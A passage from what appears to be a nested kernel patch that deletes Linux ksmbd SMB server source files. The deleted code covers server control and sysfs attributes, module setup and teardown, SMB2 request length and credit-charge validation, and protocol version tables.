+-	server_conf.min_protocol = ksmbd_min_protocol();
+-	server_conf.max_protocol = ksmbd_max_protocol();
+-	server_conf.auth_mechs = KSMBD_AUTH_NTLMSSP;
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-	server_conf.auth_mechs |= KSMBD_AUTH_KRB5 |
+-				KSMBD_AUTH_MSKRB5;
+-#endif
+-	return 0;
+-}
+-
+-static void server_ctrl_handle_init(struct server_ctrl_struct *ctrl)
+-{
+-	int ret;
+-
+-	ret = ksmbd_conn_transport_init();
+-	if (ret) {
+-		server_queue_ctrl_reset_work();
+-		return;
+-	}
+-
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_RUNNING);
+-}
+-
+-static void server_ctrl_handle_reset(struct server_ctrl_struct *ctrl)
+-{
+-	ksmbd_ipc_soft_reset();
+-	ksmbd_conn_transport_destroy();
+-	server_conf_free();
+-	server_conf_init();
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_STARTING_UP);
+-}
+-
+-static void server_ctrl_handle_work(struct work_struct *work)
+-{
+-	struct server_ctrl_struct *ctrl;
+-
+-	ctrl = container_of(work, struct server_ctrl_struct, ctrl_work);
+-
+-	mutex_lock(&ctrl_lock);
+-	switch (ctrl->type) {
+-	case SERVER_CTRL_TYPE_INIT:
+-		server_ctrl_handle_init(ctrl);
+-		break;
+-	case SERVER_CTRL_TYPE_RESET:
+-		server_ctrl_handle_reset(ctrl);
+-		break;
+-	default:
+-		pr_err("Unknown server work type: %d\n", ctrl->type);
+-	}
+-	mutex_unlock(&ctrl_lock);
+-	kfree(ctrl);
+-	module_put(THIS_MODULE);
+-}
+-
+-static int __queue_ctrl_work(int type)
+-{
+-	struct server_ctrl_struct *ctrl;
+-
+-	ctrl = kmalloc(sizeof(struct server_ctrl_struct), GFP_KERNEL);
+-	if (!ctrl)
+-		return -ENOMEM;
+-
+-	__module_get(THIS_MODULE);
+-	ctrl->type = type;
+-	INIT_WORK(&ctrl->ctrl_work, server_ctrl_handle_work);
+-	queue_work(system_long_wq, &ctrl->ctrl_work);
+-	return 0;
+-}
+-
+-int server_queue_ctrl_init_work(void)
+-{
+-	return __queue_ctrl_work(SERVER_CTRL_TYPE_INIT);
+-}
+-
+-int server_queue_ctrl_reset_work(void)
+-{
+-	return __queue_ctrl_work(SERVER_CTRL_TYPE_RESET);
+-}
+-
+-static ssize_t stats_show(struct class *class, struct class_attribute *attr,
+-			  char *buf)
+-{
+-	/*
+-	 * Inc this each time you change stats output format,
+-	 * so user space will know what to do.
+-	 */
+-	static int stats_version = 2;
+-	static const char * const state[] = {
+-		"startup",
+-		"running",
+-		"reset",
+-		"shutdown"
+-	};
+-
+-	ssize_t sz = scnprintf(buf, PAGE_SIZE, "%d %s %d %lu\n", stats_version,
+-			       state[server_conf.state], server_conf.tcp_port,
+-			       server_conf.ipc_last_active / HZ);
+-	return sz;
+-}
+-
+-static ssize_t kill_server_store(struct class *class,
+-				 struct class_attribute *attr, const char *buf,
+-				 size_t len)
+-{
+-	if (!sysfs_streq(buf, "hard"))
+-		return len;
+-
+-	pr_info("kill command received\n");
+-	mutex_lock(&ctrl_lock);
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_RESETTING);
+-	__module_get(THIS_MODULE);
+-	server_ctrl_handle_reset(NULL);
+-	module_put(THIS_MODULE);
+-	mutex_unlock(&ctrl_lock);
+-	return len;
+-}
+-
+-static const char * const debug_type_strings[] = {"smb", "auth", "vfs",
+-						  "oplock", "ipc", "conn",
+-						  "rdma"};
+-
+-static ssize_t debug_show(struct class *class, struct class_attribute *attr,
+-			  char *buf)
+-{
+-	ssize_t sz = 0;
+-	int i, pos = 0;
+-
+-	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
+-		if ((ksmbd_debug_types >> i) & 1) {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"[%s] ",
+-					debug_type_strings[i]);
+-		} else {
+-			pos = scnprintf(buf + sz,
+-					PAGE_SIZE - sz,
+-					"%s ",
+-					debug_type_strings[i]);
+-		}
+-		sz += pos;
+-	}
+-	sz += scnprintf(buf + sz, PAGE_SIZE - sz, "\n");
+-	return sz;
+-}
+-
+-static ssize_t debug_store(struct class *class, struct class_attribute *attr,
+-			   const char *buf, size_t len)
+-{
+-	int i;
+-
+-	for (i = 0; i < ARRAY_SIZE(debug_type_strings); i++) {
+-		if (sysfs_streq(buf, "all")) {
+-			if (ksmbd_debug_types == KSMBD_DEBUG_ALL)
+-				ksmbd_debug_types = 0;
+-			else
+-				ksmbd_debug_types = KSMBD_DEBUG_ALL;
+-			break;
+-		}
+-
+-		if (sysfs_streq(buf, debug_type_strings[i])) {
+-			if (ksmbd_debug_types & (1 << i))
+-				ksmbd_debug_types &= ~(1 << i);
+-			else
+-				ksmbd_debug_types |= (1 << i);
+-			break;
+-		}
+-	}
+-
+-	return len;
+-}
+-
+-static CLASS_ATTR_RO(stats);
+-static CLASS_ATTR_WO(kill_server);
+-static CLASS_ATTR_RW(debug);
+-
+-static struct attribute *ksmbd_control_class_attrs[] = {
+-	&class_attr_stats.attr,
+-	&class_attr_kill_server.attr,
+-	&class_attr_debug.attr,
+-	NULL,
+-};
+-ATTRIBUTE_GROUPS(ksmbd_control_class);
+-
+-static struct class ksmbd_control_class = {
+-	.name		= "ksmbd-control",
+-	.owner		= THIS_MODULE,
+-	.class_groups	= ksmbd_control_class_groups,
+-};
+-
+-static int ksmbd_server_shutdown(void)
+-{
+-	WRITE_ONCE(server_conf.state, SERVER_STATE_SHUTTING_DOWN);
+-
+-	class_unregister(&ksmbd_control_class);
+-	ksmbd_workqueue_destroy();
+-	ksmbd_ipc_release();
+-	ksmbd_conn_transport_destroy();
+-	ksmbd_crypto_destroy();
+-	ksmbd_free_global_file_table();
+-	destroy_lease_table(NULL);
+-	ksmbd_work_pool_destroy();
+-	ksmbd_exit_file_cache();
+-	server_conf_free();
+-	return 0;
+-}
+-
+-static int __init ksmbd_server_init(void)
+-{
+-	int ret;
+-
+-	ret = class_register(&ksmbd_control_class);
+-	if (ret) {
+-		pr_err("Unable to register ksmbd-control class\n");
+-		return ret;
+-	}
+-
+-	ksmbd_server_tcp_callbacks_init();
+-
+-	ret = server_conf_init();
+-	if (ret)
+-		goto err_unregister;
+-
+-	ret = ksmbd_work_pool_init();
+-	if (ret)
+-		goto err_unregister;
+-
+-	ret = ksmbd_init_file_cache();
+-	if (ret)
+-		goto err_destroy_work_pools;
+-
+-	ret = ksmbd_ipc_init();
+-	if (ret)
+-		goto err_exit_file_cache;
+-
+-	ret = ksmbd_init_global_file_table();
+-	if (ret)
+-		goto err_ipc_release;
+-
+-	ret = ksmbd_inode_hash_init();
+-	if (ret)
+-		goto err_destroy_file_table;
+-
+-	ret = ksmbd_crypto_create();
+-	if (ret)
+-		goto err_release_inode_hash;
+-
+-	ret = ksmbd_workqueue_init();
+-	if (ret)
+-		goto err_crypto_destroy;
+-
+-	pr_warn_once("The ksmbd server is experimental\n");
+-
+-	return 0;
+-
+-err_crypto_destroy:
+-	ksmbd_crypto_destroy();
+-err_release_inode_hash:
+-	ksmbd_release_inode_hash();
+-err_destroy_file_table:
+-	ksmbd_free_global_file_table();
+-err_ipc_release:
+-	ksmbd_ipc_release();
+-err_exit_file_cache:
+-	ksmbd_exit_file_cache();
+-err_destroy_work_pools:
+-	ksmbd_work_pool_destroy();
+-err_unregister:
+-	class_unregister(&ksmbd_control_class);
+-
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_server_exit() - shut down the forker thread and free memory at module exit
+- */
+-static void __exit ksmbd_server_exit(void)
+-{
+-	ksmbd_server_shutdown();
+-	rcu_barrier();
+-	ksmbd_release_inode_hash();
+-}
+-
+-MODULE_AUTHOR("Namjae Jeon <linkinjeon@kernel.org>");
+-MODULE_VERSION(KSMBD_VERSION);
+-MODULE_DESCRIPTION("Linux kernel CIFS/SMB SERVER");
+-MODULE_LICENSE("GPL");
+-MODULE_SOFTDEP("pre: ecb");
+-MODULE_SOFTDEP("pre: hmac");
+-MODULE_SOFTDEP("pre: md5");
+-MODULE_SOFTDEP("pre: nls");
+-MODULE_SOFTDEP("pre: aes");
+-MODULE_SOFTDEP("pre: cmac");
+-MODULE_SOFTDEP("pre: sha256");
+-MODULE_SOFTDEP("pre: sha512");
+-MODULE_SOFTDEP("pre: aead2");
+-MODULE_SOFTDEP("pre: ccm");
+-MODULE_SOFTDEP("pre: gcm");
+-MODULE_SOFTDEP("pre: crc32");
+-module_init(ksmbd_server_init)
+-module_exit(ksmbd_server_exit)
+diff --git a/fs/ksmbd/server.h b/fs/ksmbd/server.h
+deleted file mode 100644
+index db72781817603..0000000000000
+--- a/fs/ksmbd/server.h
++++ /dev/null
+@@ -1,71 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __SERVER_H__
+-#define __SERVER_H__
+-
+-#include "smbacl.h"
+-
+-/*
+- * Server state type
+- */
+-enum {
+-	SERVER_STATE_STARTING_UP,
+-	SERVER_STATE_RUNNING,
+-	SERVER_STATE_RESETTING,
+-	SERVER_STATE_SHUTTING_DOWN,
+-};
+-
+-/*
+- * Server global config string index
+- */
+-enum {
+-	SERVER_CONF_NETBIOS_NAME,
+-	SERVER_CONF_SERVER_STRING,
+-	SERVER_CONF_WORK_GROUP,
+-};
+-
+-struct ksmbd_server_config {
+-	unsigned int		flags;
+-	unsigned int		state;
+-	short			signing;
+-	short			enforced_signing;
+-	short			min_protocol;
+-	short			max_protocol;
+-	unsigned short		tcp_port;
+-	unsigned short		ipc_timeout;
+-	unsigned long		ipc_last_active;
+-	unsigned long		deadtime;
+-	unsigned int		share_fake_fscaps;
+-	struct smb_sid		domain_sid;
+-	unsigned int		auth_mechs;
+-	unsigned int		max_connections;
+-
+-	char			*conf[SERVER_CONF_WORK_GROUP + 1];
+-};
+-
+-extern struct ksmbd_server_config server_conf;
+-
+-int ksmbd_set_netbios_name(char *v);
+-int ksmbd_set_server_string(char *v);
+-int ksmbd_set_work_group(char *v);
+-
+-char *ksmbd_netbios_name(void);
+-char *ksmbd_server_string(void);
+-char *ksmbd_work_group(void);
+-
+-static inline int ksmbd_server_running(void)
+-{
+-	return READ_ONCE(server_conf.state) == SERVER_STATE_RUNNING;
+-}
+-
+-static inline int ksmbd_server_configurable(void)
+-{
+-	return READ_ONCE(server_conf.state) < SERVER_STATE_RESETTING;
+-}
+-
+-int server_queue_ctrl_init_work(void);
+-int server_queue_ctrl_reset_work(void);
+-#endif /* __SERVER_H__ */
+diff --git a/fs/ksmbd/smb2misc.c b/fs/ksmbd/smb2misc.c
+deleted file mode 100644
+index 0ffe663b75906..0000000000000
+--- a/fs/ksmbd/smb2misc.c
++++ /dev/null
+@@ -1,447 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include "glob.h"
+-#include "nterr.h"
+-#include "smb_common.h"
+-#include "smbstatus.h"
+-#include "mgmt/user_session.h"
+-#include "connection.h"
+-
+-static int check_smb2_hdr(struct smb2_hdr *hdr)
+-{
+-	/*
+-	 * Make sure that this really is an SMB request, not a response.
+-	 */
+-	if (hdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-		return 1;
+-	return 0;
+-}
+-
+-/*
+- *  The following table defines the expected "StructureSize" of SMB2 requests
+- *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
+- *
+- *  Note that commands are defined in smb2pdu.h in le16 but the array below is
+- *  indexed by command in host byte order
+- */
+-static const __le16 smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ cpu_to_le16(36),
+-	/* SMB2_SESSION_SETUP */ cpu_to_le16(25),
+-	/* SMB2_LOGOFF */ cpu_to_le16(4),
+-	/* SMB2_TREE_CONNECT */ cpu_to_le16(9),
+-	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
+-	/* SMB2_CREATE */ cpu_to_le16(57),
+-	/* SMB2_CLOSE */ cpu_to_le16(24),
+-	/* SMB2_FLUSH */ cpu_to_le16(24),
+-	/* SMB2_READ */ cpu_to_le16(49),
+-	/* SMB2_WRITE */ cpu_to_le16(49),
+-	/* SMB2_LOCK */ cpu_to_le16(48),
+-	/* SMB2_IOCTL */ cpu_to_le16(57),
+-	/* SMB2_CANCEL */ cpu_to_le16(4),
+-	/* SMB2_ECHO */ cpu_to_le16(4),
+-	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(33),
+-	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(32),
+-	/* SMB2_QUERY_INFO */ cpu_to_le16(41),
+-	/* SMB2_SET_INFO */ cpu_to_le16(33),
+-	/* use 44 for lease break */
+-	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(36)
+-};
+-
+-/*
+- * The size of the variable area depends on the offset and length fields
+- * located in different fields for various SMB2 requests. SMB2 requests
+- * with no variable length info show an offset of zero for the offset field.
+- */
+-static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ true,
+-	/* SMB2_SESSION_SETUP */ true,
+-	/* SMB2_LOGOFF */ false,
+-	/* SMB2_TREE_CONNECT */	true,
+-	/* SMB2_TREE_DISCONNECT */ false,
+-	/* SMB2_CREATE */ true,
+-	/* SMB2_CLOSE */ false,
+-	/* SMB2_FLUSH */ false,
+-	/* SMB2_READ */	true,
+-	/* SMB2_WRITE */ true,
+-	/* SMB2_LOCK */	true,
+-	/* SMB2_IOCTL */ true,
+-	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
+-	/* SMB2_ECHO */ false,
+-	/* SMB2_QUERY_DIRECTORY */ true,
+-	/* SMB2_CHANGE_NOTIFY */ false,
+-	/* SMB2_QUERY_INFO */ true,
+-	/* SMB2_SET_INFO */ true,
+-	/* SMB2_OPLOCK_BREAK */ false
+-};
+-
+-/*
+- * Set the length of the data area and the offset to the arguments;
+- * if they are invalid, return an error.
+- */
+-static int smb2_get_data_area_len(unsigned int *off, unsigned int *len,
+-				  struct smb2_hdr *hdr)
+-{
+-	int ret = 0;
+-
+-	*off = 0;
+-	*len = 0;
+-
+-	/*
+-	 * The following commands have data areas, so we have to get the location
+-	 * of the data buffer offset and data buffer length for the particular
+-	 * command.
+-	 */
+-	switch (hdr->Command) {
+-	case SMB2_SESSION_SETUP:
+-		*off = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferOffset);
+-		*len = le16_to_cpu(((struct smb2_sess_setup_req *)hdr)->SecurityBufferLength);
+-		break;
+-	case SMB2_TREE_CONNECT:
+-		*off = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathOffset);
+-		*len = le16_to_cpu(((struct smb2_tree_connect_req *)hdr)->PathLength);
+-		break;
+-	case SMB2_CREATE:
+-	{
+-		if (((struct smb2_create_req *)hdr)->CreateContextsLength) {
+-			*off = le32_to_cpu(((struct smb2_create_req *)
+-				hdr)->CreateContextsOffset);
+-			*len = le32_to_cpu(((struct smb2_create_req *)
+-				hdr)->CreateContextsLength);
+-			break;
+-		}
+-
+-		*off = le16_to_cpu(((struct smb2_create_req *)hdr)->NameOffset);
+-		*len = le16_to_cpu(((struct smb2_create_req *)hdr)->NameLength);
+-		break;
+-	}
+-	case SMB2_QUERY_INFO:
+-		*off = le16_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferOffset);
+-		*len = le32_to_cpu(((struct smb2_query_info_req *)hdr)->InputBufferLength);
+-		break;
+-	case SMB2_SET_INFO:
+-		*off = le16_to_cpu(((struct smb2_set_info_req *)hdr)->BufferOffset);
+-		*len = le32_to_cpu(((struct smb2_set_info_req *)hdr)->BufferLength);
+-		break;
+-	case SMB2_READ:
+-		*off = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoOffset);
+-		*len = le16_to_cpu(((struct smb2_read_req *)hdr)->ReadChannelInfoLength);
+-		break;
+-	case SMB2_WRITE:
+-		if (((struct smb2_write_req *)hdr)->DataOffset ||
+-		    ((struct smb2_write_req *)hdr)->Length) {
+-			*off = max_t(unsigned int,
+-				     le16_to_cpu(((struct smb2_write_req *)hdr)->DataOffset),
+-				     offsetof(struct smb2_write_req, Buffer));
+-			*len = le32_to_cpu(((struct smb2_write_req *)hdr)->Length);
+-			break;
+-		}
+-
+-		*off = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoOffset);
+-		*len = le16_to_cpu(((struct smb2_write_req *)hdr)->WriteChannelInfoLength);
+-		break;
+-	case SMB2_QUERY_DIRECTORY:
+-		*off = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameOffset);
+-		*len = le16_to_cpu(((struct smb2_query_directory_req *)hdr)->FileNameLength);
+-		break;
+-	case SMB2_LOCK:
+-	{
+-		unsigned short lock_count;
+-
+-		lock_count = le16_to_cpu(((struct smb2_lock_req *)hdr)->LockCount);
+-		if (lock_count > 0) {
+-			*off = offsetof(struct smb2_lock_req, locks);
+-			*len = sizeof(struct smb2_lock_element) * lock_count;
+-		}
+-		break;
+-	}
+-	case SMB2_IOCTL:
+-		*off = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputOffset);
+-		*len = le32_to_cpu(((struct smb2_ioctl_req *)hdr)->InputCount);
+-		break;
+-	default:
+-		ksmbd_debug(SMB, "no length check for command\n");
+-		break;
+-	}
+-
+-	if (*off > 4096) {
+-		ksmbd_debug(SMB, "offset %d too large\n", *off);
+-		ret = -EINVAL;
+-	} else if ((u64)*off + *len > MAX_STREAM_PROT_LEN) {
+-		ksmbd_debug(SMB, "Request is larger than maximum stream protocol length(%u): %llu\n",
+-			    MAX_STREAM_PROT_LEN, (u64)*off + *len);
+-		ret = -EINVAL;
+-	}
+-
+-	return ret;
+-}
+-
+-/*
+- * Calculate the size of the SMB message based on the fixed header
+- * portion, the number of word parameters and the data portion of the message.
+- */
+-static int smb2_calc_size(void *buf, unsigned int *len)
+-{
+-	struct smb2_pdu *pdu = (struct smb2_pdu *)buf;
+-	struct smb2_hdr *hdr = &pdu->hdr;
+-	unsigned int offset; /* the offset from the beginning of SMB to data area */
+-	unsigned int data_length; /* the length of the variable length data area */
+-	int ret;
+-
+-	/* Structure Size has already been checked to make sure it is 64 */
+-	*len = le16_to_cpu(hdr->StructureSize);
+-
+-	/*
+-	 * StructureSize2, ie length of fixed parameter area has already
+-	 * been checked to make sure it is the correct length.
+-	 */
+-	*len += le16_to_cpu(pdu->StructureSize2);
+-	/*
+-	 * StructureSize2 of smb2_lock pdu is set to 48, indicating
+-	 * the size of smb2 lock request with single smb2_lock_element
+-	 * regardless of number of locks. Subtract single
+-	 * smb2_lock_element for correct buffer size check.
+-	 */
+-	if (hdr->Command == SMB2_LOCK)
+-		*len -= sizeof(struct smb2_lock_element);
+-
+-	if (has_smb2_data_area[le16_to_cpu(hdr->Command)] == false)
+-		goto calc_size_exit;
+-
+-	ret = smb2_get_data_area_len(&offset, &data_length, hdr);
+-	if (ret)
+-		return ret;
+-	ksmbd_debug(SMB, "SMB2 data length %u offset %u\n", data_length,
+-		    offset);
+-
+-	if (data_length > 0) {
+-		/*
+-		 * Check to make sure that data area begins after fixed area,
+-		 * Note that last byte of the fixed area is part of data area
+-		 * for some commands, typically those with odd StructureSize,
+-		 * so we must add one to the calculation.
+-		 */
+-		if (offset + 1 < *len) {
+-			ksmbd_debug(SMB,
+-				    "data area offset %d overlaps SMB2 header %u\n",
+-				    offset + 1, *len);
+-			return -EINVAL;
+-		}
+-
+-		*len = offset + data_length;
+-	}
+-
+-calc_size_exit:
+-	ksmbd_debug(SMB, "SMB2 len %u\n", *len);
+-	return 0;
+-}
+-
+-static inline int smb2_query_info_req_len(struct smb2_query_info_req *h)
+-{
+-	return le32_to_cpu(h->InputBufferLength) +
+-		le32_to_cpu(h->OutputBufferLength);
+-}
+-
+-static inline int smb2_set_info_req_len(struct smb2_set_info_req *h)
+-{
+-	return le32_to_cpu(h->BufferLength);
+-}
+-
+-static inline int smb2_read_req_len(struct smb2_read_req *h)
+-{
+-	return le32_to_cpu(h->Length);
+-}
+-
+-static inline int smb2_write_req_len(struct smb2_write_req *h)
+-{
+-	return le32_to_cpu(h->Length);
+-}
+-
+-static inline int smb2_query_dir_req_len(struct smb2_query_directory_req *h)
+-{
+-	return le32_to_cpu(h->OutputBufferLength);
+-}
+-
+-static inline int smb2_ioctl_req_len(struct smb2_ioctl_req *h)
+-{
+-	return le32_to_cpu(h->InputCount) +
+-		le32_to_cpu(h->OutputCount);
+-}
+-
+-static inline int smb2_ioctl_resp_len(struct smb2_ioctl_req *h)
+-{
+-	return le32_to_cpu(h->MaxInputResponse) +
+-		le32_to_cpu(h->MaxOutputResponse);
+-}
+-
+-static int smb2_validate_credit_charge(struct ksmbd_conn *conn,
+-				       struct smb2_hdr *hdr)
+-{
+-	unsigned int req_len = 0, expect_resp_len = 0, calc_credit_num, max_len;
+-	unsigned short credit_charge = le16_to_cpu(hdr->CreditCharge);
+-	void *__hdr = hdr;
+-	int ret = 0;
+-
+-	switch (hdr->Command) {
+-	case SMB2_QUERY_INFO:
+-		req_len = smb2_query_info_req_len(__hdr);
+-		break;
+-	case SMB2_SET_INFO:
+-		req_len = smb2_set_info_req_len(__hdr);
+-		break;
+-	case SMB2_READ:
+-		req_len = smb2_read_req_len(__hdr);
+-		break;
+-	case SMB2_WRITE:
+-		req_len = smb2_write_req_len(__hdr);
+-		break;
+-	case SMB2_QUERY_DIRECTORY:
+-		req_len = smb2_query_dir_req_len(__hdr);
+-		break;
+-	case SMB2_IOCTL:
+-		req_len = smb2_ioctl_req_len(__hdr);
+-		expect_resp_len = smb2_ioctl_resp_len(__hdr);
+-		break;
+-	case SMB2_CANCEL:
+-		return 0;
+-	default:
+-		req_len = 1;
+-		break;
+-	}
+-
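+-	/*
+-	 * The charge must cover the larger of the request payload and the
+-	 * expected response payload, in units of SMB2_MAX_BUFFER_SIZE.
+-	 */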
+-	credit_charge = max_t(unsigned short, credit_charge, 1);
+-	max_len = max_t(unsigned int, req_len, expect_resp_len);
+-	calc_credit_num = DIV_ROUND_UP(max_len, SMB2_MAX_BUFFER_SIZE);
+-
+-	if (credit_charge < calc_credit_num) {
+-		ksmbd_debug(SMB, "Insufficient credit charge, given: %d, needed: %d\n",
+-			    credit_charge, calc_credit_num);
+-		return 1;
+-	} else if (credit_charge > conn->vals->max_credits) {
+-		ksmbd_debug(SMB, "Too large credit charge: %d\n", credit_charge);
+-		return 1;
+-	}
+-
+-	spin_lock(&conn->credits_lock);
+-	if (credit_charge > conn->total_credits) {
+-		ksmbd_debug(SMB, "Insufficient credits granted, given: %u, granted: %u\n",
+-			    credit_charge, conn->total_credits);
+-		ret = 1;
+-	}
+-
+-	if ((u64)conn->outstanding_credits + credit_charge > conn->total_credits) {
+-		ksmbd_debug(SMB, "Limits exceeding the maximum allowable outstanding requests, given : %u, pending : %u\n",
+-			    credit_charge, conn->outstanding_credits);
+-		ret = 1;
+-	} else
+-		conn->outstanding_credits += credit_charge;
+-
+-	spin_unlock(&conn->credits_lock);
+-
+-	return ret;
+-}
+-
+-int ksmbd_smb2_check_message(struct ksmbd_work *work)
+-{
+-	struct smb2_pdu *pdu = ksmbd_req_buf_next(work);
+-	struct smb2_hdr *hdr = &pdu->hdr;
+-	int command;
+-	__u32 clc_len;  /* calculated length */
+-	__u32 len = get_rfc1002_len(work->request_buf);
+-
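+-	/*
+-	 * For a compound request, validate only the current PDU: its length
+-	 * runs up to the next chained header, or to the end of the buffer
+-	 * for the final PDU.
+-	 */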
+-	if (le32_to_cpu(hdr->NextCommand) > 0)
+-		len = le32_to_cpu(hdr->NextCommand);
+-	else if (work->next_smb2_rcv_hdr_off)
+-		len -= work->next_smb2_rcv_hdr_off;
+-
+-	if (check_smb2_hdr(hdr))
+-		return 1;
+-
+-	if (hdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
+-		ksmbd_debug(SMB, "Illegal structure size %u\n",
+-			    le16_to_cpu(hdr->StructureSize));
+-		return 1;
+-	}
+-
+-	command = le16_to_cpu(hdr->Command);
+-	if (command >= NUMBER_OF_SMB2_COMMANDS) {
+-		ksmbd_debug(SMB, "Illegal SMB2 command %d\n", command);
+-		return 1;
+-	}
+-
+-	if (smb2_req_struct_sizes[command] != pdu->StructureSize2) {
+-		if (command != SMB2_OPLOCK_BREAK_HE &&
+-		    (hdr->Status == 0 || pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
+-			/* error packets have a 9-byte structure size */
+-			ksmbd_debug(SMB,
+-				    "Illegal request size %u for command %d\n",
+-				    le16_to_cpu(pdu->StructureSize2), command);
+-			return 1;
+-		} else if (command == SMB2_OPLOCK_BREAK_HE &&
+-			   hdr->Status == 0 &&
+-			   le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_20 &&
+-			   le16_to_cpu(pdu->StructureSize2) != OP_BREAK_STRUCT_SIZE_21) {
+-			/* special case for SMB2.1 lease break message */
+-			ksmbd_debug(SMB,
+-				    "Illegal request size %d for oplock break\n",
+-				    le16_to_cpu(pdu->StructureSize2));
+-			return 1;
+-		}
+-	}
+-
+-	if (smb2_calc_size(hdr, &clc_len))
+-		return 1;
+-
+-	if (len != clc_len) {
+-		/* the client can send one byte more due to the implied bcc[0] */
+-		if (clc_len == len + 1)
+-			goto validate_credit;
+-
+-		/*
+-		 * Some Windows servers (win2016) also pad the final
+-		 * PDU in a compound to 8 bytes.
+-		 */
+-		if (ALIGN(clc_len, 8) == len)
+-			goto validate_credit;
+-
+-		/*
+-		 * SMB2 NEGOTIATE request will be validated when message
+-		 * handling proceeds.
+-		 */
+-		if (command == SMB2_NEGOTIATE_HE)
+-			goto validate_credit;
+-
+-		/*
+-		 * Allow a message padded to an 8-byte boundary.
+-		 * Linux 4.19.217 with SMB 3.0.2 sometimes sends
+-		 * messages where clc_len is exactly 8 bytes less
+-		 * than len.
+-		 */
+-		if (clc_len < len && (len - clc_len) <= 8)
+-			goto validate_credit;
+-
+-		pr_err_ratelimited(
+-			    "cli req too short, len %d not %d. cmd:%d mid:%llu\n",
+-			    len, clc_len, command,
+-			    le64_to_cpu(hdr->MessageId));
+-
+-		return 1;
+-	}
+-
+-validate_credit:
+-	if ((work->conn->vals->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU) &&
+-	    smb2_validate_credit_charge(work->conn, hdr)) {
+-		work->conn->ops->set_rsp_status(work, STATUS_INVALID_PARAMETER);
+-		return 1;
+-	}
+-
+-	return 0;
+-}
+-
+-int smb2_negotiate_request(struct ksmbd_work *work)
+-{
+-	return ksmbd_smb_negotiate_common(work, SMB2_NEGOTIATE_HE);
+-}
+diff --git a/fs/ksmbd/smb2ops.c b/fs/ksmbd/smb2ops.c
+deleted file mode 100644
+index ab23da2120b94..0000000000000
+--- a/fs/ksmbd/smb2ops.c
++++ /dev/null
+@@ -1,314 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/slab.h>
+-#include "glob.h"
+-
+-#include "auth.h"
+-#include "connection.h"
+-#include "smb_common.h"
+-#include "server.h"
+-
+-static struct smb_version_values smb21_server_values = {
+-	.version_string = SMB21_VERSION_STRING,
+-	.protocol_id = SMB21_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB21_DEFAULT_IOSIZE,
+-	.max_write_size = SMB21_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB21_DEFAULT_IOSIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
+-	.lock_cmd = SMB2_LOCK,
+-	.cap_unix = 0,
+-	.cap_nt_find = SMB2_NT_FIND,
+-	.cap_large_files = SMB2_LARGE_FILES,
+-	.create_lease_size = sizeof(struct create_lease),
+-	.create_durable_size = sizeof(struct create_durable_rsp),
+-	.create_mxac_size = sizeof(struct create_mxac_rsp),
+-	.create_disk_id_size = sizeof(struct create_disk_id_rsp),
+-	.create_posix_size = sizeof(struct create_posix_rsp),
+-};
+-
+-static struct smb_version_values smb30_server_values = {
+-	.version_string = SMB30_VERSION_STRING,
+-	.protocol_id = SMB30_PROT_ID,
+-	.capabilities = SMB2_GLOBAL_CAP_LARGE_MTU,
+-	.max_read_size = SMB3_DEFAULT_IOSIZE,
+-	.max_write_size = SMB3_DEFAULT_IOSIZE,
+-	.max_trans_size = SMB3_DEFAULT_TRANS_SIZE,
+-	.max_credits = SMB2_MAX_CREDITS,
+-	.large_lock_type = 0,
+-	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
+-	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
+-	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
+-	.header_size = sizeof(struct smb2_hdr),
+-	.max_header_size = MAX_SMB2_HDR_SIZE,
+-	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
